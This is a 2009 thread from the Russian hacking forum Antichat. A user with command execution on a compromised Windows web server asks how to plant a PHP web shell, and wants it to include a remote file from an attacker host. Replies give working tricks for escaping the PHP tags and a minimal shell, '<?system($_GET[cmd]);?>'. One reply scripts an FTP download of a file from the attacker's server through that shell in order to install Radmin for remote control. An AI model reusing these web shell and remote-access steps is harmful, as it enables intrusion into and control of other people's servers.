Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - cmd???? (https://forum.antichat.xyz/showthread.php?t=104960)

fly	06.02.2009 16:13

cmd????

Вопрос такой!
Есть доступ к командной строке на win сервере , через cmd могу выполнять команды , хотел создать файл Php и впихнуть , синтаксис такой

так создается
echo test > "D:\Website\WWW\1.php"

если так вообще ничего не создается
echo <?php passthru $cmd?> > "D:\Website\WWW\1.php"

если так ,создается, но с кавычками
echo "<?php passthru $cmd?>" > "D:\Website\WWW\1.php"

т.е. на выходе получаю "<?php passthru $cmd?>"
Php на серваке есть!

Как добавить Php код , чтобы он выполнялся!?Желательно <?@include('http://hack/shell.txt');?>

p.s. ftp не предлагать , tftp тоже, не прокатит,Фаер фильтрут выход.!!!

gold-goblin

06.02.2009 16:18

как выйти именно из этой ситуации я хз..
Попробуй поднять фтп и передать шел =)

fly	06.02.2009 16:21

gold-goblin

Да не да типичная ситуация, попробуй на своем компе локально создать файл и передать ему php код. Я просто не знаю точного синтаксиса на win

Brain explosion

06.02.2009 16:22

нах тебе php-шелл, если у тебя уже cmd-шелл?

Pashkela

06.02.2009 16:26

Цитата:

fly

если так ,создается, но с кавычками
echo "<?php passthru $cmd?>" > "D:\Website\WWW\1.php"

edit D:\Website\WWW\1.php

geezer.code

06.02.2009 16:30

а чем кавычки мешают ? он и с ними будет нормально интерпретироваться.

fly	06.02.2009 16:35

to geezer.code

нет белый фон ""

а в исходники страницы "<?phpinfo();?>"

вообще не в тему Pashkela

Pashkela

06.02.2009 16:36

Цитата:

вообще не в тему Pashkela

почему? У меня работает

сначала залил, точно как ты, а потом edit и убираешь кавычки

fly	06.02.2009 16:40

)))это локально)) , а у меня через сплоит перловый!

geezer.code

06.02.2009 16:41

а ты сделай "<?php phpinfo();?>" обязательно - php
проверил локально, работает.

"<?phpinfo();?>" тоже выводит "" :)

Pashkela

06.02.2009 16:47

Тогда так:

echo ^<?php passthru $cmd?^> > "D:\Website\WWW\1.php"

-m0rgan-

06.02.2009 16:50

Создай сначала сам файл: echo > 1.php
Затем отредакти его: edit > 1.php
и впиши свой код, затем сохрани и все)

fly	06.02.2009 17:12

просто сервак глюченый , ничего не получилось)!

$n@ke

06.02.2009 18:12

смотри за пробелами!!!
<? phpinfo(); ?>

попробуй так еще:
эхом создаешь файл с кавычками, через more - попробуй их убрать потом.
ну а если сделаешь вместо кавычек табуляцию, то потом:
more /T1 file.php

fly	06.02.2009 18:21

что там с правами
ибо в той дире де бажный скрипт работает php

В чем может быть дело еще?

schwarze

16.02.2009 17:09

У меня была подобная ситуация. У меня был шел вида <?php system(cmd) ?>. Вся проблема состоит в том, что тебе дает выполнять только одну команду. И команда edit ничего не даст. Решение было такое - так как "сервак" виндовый - можно залить Radmin и уже спомощью него можно делать что угодно.
Залить лучше всего через ФТП. команды такие

Код:

echo open ТВОЙ_FTP>go

echo binary >>go

echo get файл>go

....

echo bye>go

Запускать потом (ftp анонимный)

site.com/shell.php?cmd=ftp -A -s:go

o3,14um

17.02.2009 10:18

fly, я не понимаю в чём там проблема. ДОлжно всё работать. Объясни подробнее что не получаеся.

Может просто регистрГолобалз ОФФ? ТОгда нужно шелл такой создавать:

<?system($_GET[cmd]);?>

Время: 00:19